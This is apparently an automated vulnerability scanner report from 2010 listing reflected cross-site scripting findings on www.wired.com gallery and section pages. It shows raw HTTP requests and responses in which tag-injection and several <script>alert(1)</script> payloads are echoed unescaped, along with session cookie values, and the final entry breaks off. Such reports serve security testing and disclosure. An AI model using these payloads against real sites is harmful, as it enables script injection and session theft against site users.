GET /culture/artc7c4c"><a>89e1688aab6/multimedia/2008/07/gallery_top_10_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29303 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:17 GMT Date: Sun, 21 Nov 2010 23:07:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_artc7c4c"><a>89e1688aab6 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d71fa"><a>b579a399708 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimediad71fa"><a>b579a399708/2008/07/gallery_top_10_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29303 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:33 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimediad71fa"><a>b579a399708"> ...[SNIP]...
1.78. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8377"><script>alert(1)</script>a852d762798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:56 GMT Date: Sun, 21 Nov 2010 23:06:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc57e"><a>6479810cedb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturefc57e"><a>6479810cedb/art/multimedia/2008/10/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturefc57e"><a>6479810cedb ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287df"><a>b9badeee24d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art287df"><a>b9badeee24d/multimedia/2008/10/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:43 GMT Date: Sun, 21 Nov 2010 23:06:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art287df"><a>b9badeee24d c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5771a"><a>9832fc9791e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia5771a"><a>9832fc9791e/2008/10/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29298 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia5771a"><a>9832fc9791e"> ...[SNIP]...
1.82. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.wired.com
Path: /culture/art/multimedia/2008/10/gallery_trains
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54b5"><script>alert(1)</script>ea506289b5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1308"><a>62b113b6ddc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturec1308"><a>62b113b6ddc/art/news/2008/06/submissions_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29288 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:15 GMT Date: Sun, 21 Nov 2010 23:07:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturec1308"><a>62b113b6ddc ss_art c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b07"><a>51bc0c4125e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art33b07"><a>51bc0c4125e/news/2008/06/submissions_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29288 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:37 GMT Date: Sun, 21 Nov 2010 23:07:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art33b07"><a>51bc0c4125e c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ea3"><a>733ee83aeca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/newsb8ea3"><a>733ee83aeca/2008/06/submissions_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29288 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:49 GMT Date: Sun, 21 Nov 2010 23:07:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_newsb8ea3"><a>733ee83aeca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b187a"><a>710ea181819 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureb187a"><a>710ea181819/culturereviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29273 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Sun, 21 Nov 2010 23:09:50 GMT Date: Sun, 21 Nov 2010 23:06:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureb187a"><a>710ea181819 ss_culturereviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c101a"><a>c9bdd73e8c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/culturereviewsc101a"><a>c9bdd73e8c4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29273 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:27 GMT Date: Sun, 21 Nov 2010 23:06:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_culturereviewsc101a"><a>c9bdd73e8c4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3632"><a>7fc96fc4812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturee3632"><a>7fc96fc4812/design HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29257 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:03 GMT Date: Sun, 21 Nov 2010 23:06:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturee3632"><a>7fc96fc4812 ss_design"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4088a"><a>cab77e397f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/design4088a"><a>cab77e397f3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29257 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:29 GMT Date: Sun, 21 Nov 2010 23:06:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_design4088a"><a>cab77e397f3"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2f5"><a>35b68f7c68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureda2f5"><a>35b68f7c68f/design/multimedia/2008/06/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29304 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureda2f5"><a>35b68f7c68f ss_design c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4136"><a>4e71b2b298e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/designe4136"><a>4e71b2b298e/multimedia/2008/06/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29304 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:19 GMT Date: Sun, 21 Nov 2010 23:07:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_designe4136"><a>4e71b2b298e c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1447"><a>17257c56c9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/design/multimediae1447"><a>17257c56c9f/2008/06/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29304 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:36 GMT Date: Sun, 21 Nov 2010 23:07:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_design c_multimediae1447"><a>17257c56c9f"> ...[SNIP]...
1.93. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.wired.com
Path: /culture/design/multimedia/2008/06/gallery_trains
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add6e"><script>alert(1)</script>a2b64047b26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
